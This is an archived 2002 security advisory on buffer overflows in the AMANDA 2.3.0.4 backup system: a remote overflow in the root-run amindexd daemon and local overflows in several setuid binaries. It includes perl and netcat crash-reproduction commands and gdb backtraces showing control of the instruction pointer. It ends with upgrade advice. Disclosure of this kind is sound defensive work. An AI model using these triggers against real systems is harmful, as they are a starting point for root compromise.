30th May 2002 [SBWID-5375]
COMMAND
Amanda various buffer overflows, local & remote
SYSTEMS AFFECTED
2.3.0.4
PROBLEM
zillion [http://www.safemode.org] published a security advisory
regarding AMANDA. The Advanced Maryland Automatic Network Disk Archiver
(AMANDA) is a backup system which is available for many different
Unix-based operating systems. Several setuid and setgid binaries which
are installed by this package contain buffer overflow vulnerabilities
that can be used to execute shellcode with elevated privileges.
Additionally, the amindexd daemon contains a remote overflow bug that
can lead to a remote system compromise.
The affected version of AMANDA is an old package but is often used due
to compatibility problems with newer versions. For example, this
package was until recently shipped with the FreeBSD 4.5 ports
collection.
The local overflows are all found in files that can only be executed by
those that are member of the operator group. This is a big limitation
to anyone that is trying to abuse amanda locally as normal users are
not member of this group. The big risk here is the amindexd daemon
(10082/TCP) that runs as root and contains several overflows of which
two can be triggered without any knowledge of the affect systems
configuration.
The amindexd daemon (remote, runs as root)
-------------------------------------------
Long commands send to this server will result in an immediate overflow
This does not require any knowledge of the affect systems
configuration. Simple replication of this overflow:
perl -e \'print \"A\" x 260;print \"BBBB\";\' | nc localhost 10082
perl -e \'print \"DATE \"; print \"A\" x 260;\' | nc localhost 10082
The below listed file are only accessible by users that are member of
the group \'operator\'. This is a big limitation for anyone that will
try to abuse them ;).
The amcheck file (setuid root)
-------------------------------------------
bash-2.05a# /usr/local/bin/amcheck `perl -e \'print \"A\" x 1000\'`
Segmentation fault (core dumped)
(gdb) bt
#0 0x2814c022 in ?? ()
#1 0x280f8c0a in ?? ()
#2 0x804d671 in ?? ()
#3 0x41414141 in ?? ()
Cannot access memory at address 0x41414141.
(gdb)
The amgetidx file (setuid operator)
-------------------------------------------
(gdb) bash-2.05a# gdb /usr/local/libexec/amanda/amgetidx
(gdb) r `perl -e \'print \"A\" x 3000\'`
Starting program: /usr/local/libexec/amanda/amgetidx `perl -e \'print \"A\" x
3000\'`
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28144022 in vfprintf () from /usr/lib/libc.so.4
(gdb) bt
#0 0x28144022 in vfprintf () from /usr/lib/libc.so.4
#1 0x280f0c0a in vsprintf () from /usr/lib/libc.so.4
#2 0x804c8dd in getsockname ()
#3 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)
The amtrmidx file (setuid operator)
-------------------------------------------
bash-2.05a# gdb /usr/local/libexec/amanda/amtrmidx
(gdb) r `perl -e \'print \"A\" x 3000\'`
Starting program: /usr/local/libexec/amanda/amtrmidx `perl -e \'print \"A\" x
3000\'`
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28141022 in vfprintf () from /usr/lib/libc.so.4
(gdb) bt
#0 0x28141022 in vfprintf () from /usr/lib/libc.so.4
#1 0x280edc0a in vsprintf () from /usr/lib/libc.so.4
#2 0x804b291 in free ()
#3 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)
The createindex-dump file (setuid operator)
-------------------------------------------
sh-2.05a# gdb /usr/local/libexec/amanda/createindex-dump
(gdb) r `perl -e \'print \"A\" x 4000\'` a a a
Starting program: /usr/local/libexec/amanda/createindex-dump `perl -e
\'print \"A\" x 4000\'` a a a
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814398c in getenv () from /usr/lib/libc.so.4
(gdb) bt
#0 0x2814398c in getenv () from /usr/lib/libc.so.4
#1 0x28142801 in isatty () from /usr/lib/libc.so.4
#2 0x2814362e in malloc () from /usr/lib/libc.so.4
#3 0x280fbec2 in popen () from /usr/lib/libc.so.4
#4 0x8048874 in atoi ()
#5 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)
The createindex-gnutar file (setuid operator)
----------------------------------------------
bash-2.05a# gdb /usr/local/libexec/amanda/createindex-gnutar
(gdb) r `perl -e \'print \"A\" x 4000\'` a a a
Starting program: /usr/local/libexec/amanda/createindex-gnutar `perl -e
\'print \"A\" x 4000\'` a a a
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814398c in getenv () from /usr/lib/libc.so.4
(gdb) bt
#0 0x2814398c in getenv () from /usr/lib/libc.so.4
#1 0x28142801 in isatty () from /usr/lib/libc.so.4
#2 0x2814362e in malloc () from /usr/lib/libc.so.4
#3 0x280fbec2 in popen () from /usr/lib/libc.so.4
#4 0x8048811 in atoi ()
#5 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)
SOLUTION
Upgrade AMANDA to the latest stable version , which is available from
the developers web site: http://www.amanda.org
As noted earlier, this affects the FreeBSD ports collection that is
shipped with 4.5 or earlier. FreeBSD was contacted and has removed the
vulnerable AMANDA port.
Thanks AMANDA developers and FreeBSD for the fast reaction on this
issue.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
